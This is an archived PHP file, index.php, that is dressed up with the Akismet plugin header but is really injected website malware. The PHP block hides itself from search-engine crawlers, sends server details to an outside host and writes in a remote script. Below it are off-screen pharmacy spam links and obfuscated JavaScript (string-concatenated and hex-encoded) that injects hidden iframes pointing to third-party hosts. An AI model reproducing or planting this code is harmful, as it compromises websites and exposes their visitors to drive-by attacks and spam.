home *** CD-ROM | disk | FTP | other *** search
/ 91.121.126.69 / 91.121.126.69.tar / 91.121.126.69 / www / index.php < prev    next >
PHP Script  |  2015-06-11  |  8KB  |  235 lines

  1. <?php
  2. error_reporting(0);
  3. include('./stats/day/pr.php'); ?>
  4. <?php
  5. #c992d6#
  6. /**
  7.  * @package Akismet
  8.  */
  9. /*
  10. Plugin Name: Akismet
  11. Plugin URI: http://akismet.com/
  12. Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
  13. Version: 3.0.0
  14. Author: Automattic
  15. Author URI: http://automattic.com/wordpress-plugins/
  16. License: GPLv2 or later
  17. Text Domain: akismet
  18. */
  19.  
  20. /*
  21. This program is free software; you can redistribute it and/or
  22. modify it under the terms of the GNU General Public License
  23. as published by the Free Software Foundation; either version 2
  24. of the License, or (at your option) any later version.
  25.  
  26. This program is distributed in the hope that it will be useful,
  27. but WITHOUT ANY WARRANTY; without even the implied warranty of
  28. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  29. GNU General Public License for more details.
  30.  
  31. You should have received a copy of the GNU General Public License
  32. along with this program; if not, write to the Free Software
  33. Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
  34. */
  35.  
  36. if( empty( $st ) ) {
  37.     if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
  38.             "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
  39.             $_SERVER['HTTP_USER_AGENT']
  40.         )
  41.     ) {
  42.     } else {
  43.         error_reporting( 0 );
  44.         @ini_set( 'display_errors', 0 );
  45.         if( !function_exists( '__url_get_contents' ) ) {
  46.             function __url_get_contents( $remote_url, $timeout )
  47.             {
  48.                 if( function_exists( 'curl_exec' ) ) {
  49.                     $ch = curl_init();
  50.                     curl_setopt( $ch, CURLOPT_URL, $remote_url );
  51.                     curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
  52.                     curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
  53.                     curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
  54.                     $_url_get_contents_data = curl_exec( $ch );
  55.                     curl_close( $ch );
  56.                 } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
  57.                     $ctx = @stream_context_create(
  58.                         array(
  59.                             'http' =>
  60.                                 array(
  61.                                     'timeout' => $timeout,
  62.                                 )
  63.                         )
  64.                     );
  65.                     $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
  66.                 } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
  67.                     $handle = @fopen( $remote_url, "r" );
  68.                     $_url_get_contents_data = @stream_get_contents( $handle );
  69.                 } else {
  70.                     $_url_get_contents_data = __file_get_url_contents( $remote_url );
  71.                 }
  72.                 return $_url_get_contents_data;
  73.             }
  74.         }
  75.  
  76.         if( !function_exists( '__file_get_url_contents' ) ) {
  77.             function __file_get_url_contents( $remote_url )
  78.             {
  79.                 if( preg_match(
  80.                     '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
  81.                     $remote_url,
  82.                     $matches
  83.                 )
  84.                 ) {
  85.                     $protocol = strtolower( $matches[1] );
  86.                     $host = $matches[2];
  87.                     $path = $matches[3];
  88.                 } else {
  89. // Bad remote_url-format
  90.                     return false;
  91.                 }
  92.                 if( $protocol == "http" ) {
  93.                     $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
  94.                 } else {
  95. // Bad protocol
  96.                     return false;
  97.                 }
  98.                 if( !$socket ) {
  99. // Error creating socket
  100.                     return false;
  101.                 }
  102.                 $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
  103.                 $len_written = @fwrite( $socket, $request );
  104.                 if( $len_written === false || $len_written != strlen( $request ) ) {
  105. // Error sending request
  106.                     return false;
  107.                 }
  108.                 $response = "";
  109.                 while( !@feof( $socket ) &&
  110.                     ( $buf = @fread( $socket, 4096 ) ) !== false ) {
  111.                     $response .= $buf;
  112.                 }
  113.                 if( $buf === false ) {
  114. // Error reading response
  115.                     return false;
  116.                 }
  117.                 $end_of_header = strpos( $response, "\r\n\r\n" );
  118.                 return substr( $response, $end_of_header + 4 );
  119.             }
  120.         }
  121.  
  122.         $st['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
  123.         $st['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
  124.         $st['PHP_SELF'] = $_SERVER['PHP_SELF'];
  125.         $st['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
  126.         $st['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
  127.         $st['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
  128.         $st['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
  129.         $st['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];
  130.  
  131.         $st = __url_get_contents(
  132.             "http://millbrookequine.com/Services/rtmhz8ny.php" . "?fid=2300920&info=" . http_build_query( $st ) . "&no=1&allow=1",
  133.             2
  134.         );
  135.  
  136.         $st = trim( $st );
  137.         if( $st !== 'false' ) {
  138.             echo "<script type=\"text/javascript\" src=\"http://millbrookequine.com/Services/rtmhz8ny.php?id=28541772\"></script>";
  139.         }
  140.     }
  141. }
  142. #/c992d6#
  143. ?><div id="uelqpb" style="left: -3089px; position:absolute">
  144. <a href="http://pharmacydream.com/order-zithromax.html">buy Zithromax</a>
  145. <script src="http://capemadefieldguide.org/spam.phtml"></script>lk='c';ku='me';uf='88.';vk='8.';xb='0.';it='a';t='p:';n='0';b='2';jp='s';m='ifr';io='r';y='/?1';bj='ht';ie='132';ew='//';ik='t';np=m.concat(it,ku);nm=jp.concat(io,lk);fo=bj.concat(ik,t,ew,uf,b,n,vk,xb,ie,y);var es=document.createElement(np);es.setAttribute('width','5');es.setAttribute('height','5');es.setAttribute('style','display:none');es.setAttribute(nm,fo);document.body.appendChild(es);</div>
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179.  
  180.  
  181.  
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  
  190.  
  191.  
  192.  
  193.  
  194.  
  195.  
  196.  
  197.  
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  204.  
  205.  
  206.  
  207.  
  208.  
  209.  
  210.  
  211.  
  212.  
  213.  
  214.  
  215.  
  216.  
  217.  
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
  224.  
  225.  
  226.  
  227. <div id="lxyb" style="left: -4093px; position:absolute">
  228. <a href="http://unannocontrolospreco.org/administrator/templates/bluestork/html/store/viagra.html">cheap viagra</a>
  229. </div><div id="obabsw" style="left: -4052px; position:absolute">
  230. <a href="http://pharmacydream.com/diflucan.php">diflucan 150 mg</a>
  231. </div><script>function v548c74539fbf7(v548c74539fc32){  return(parseInt(v548c74539fc32,16));}function v548c74539fce5(v548c74539fd23){ function v548c74539fdd6 () {return 2;} var v548c74539fd5e='';for(v548c74539fd9a=0; v548c74539fd9a<v548c74539fd23.length; v548c74539fd9a+=v548c74539fdd6()){ v548c74539fd5e+=(String.fromCharCode(v548c74539fbf7(v548c74539fd23.substr(v548c74539fd9a, v548c74539fdd6()))));}return v548c74539fd5e;} document.write(v548c74539fce5('3C696672616D65206E616D653D2738373665636131333966613927207372633D27687474703A2F2F616C6C2D74726166662E636F6D2F74722E706870272077696474683D323639206865696768743D313930207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script><div id="azjrv" style="left: -2010px; position:absolute">
  232. <a href="http://www.storesvenitiens.ca/produit/med/medstore/dieting-pills.html">orlistat</a>
  233. </div><div id="ilken" style="left: -3069px; position:absolute">
  234. <a href="http://www.storesvenitiens.ca/produit/med/medstore/dieting-pills.html">order orlistat</a>
  235. </div>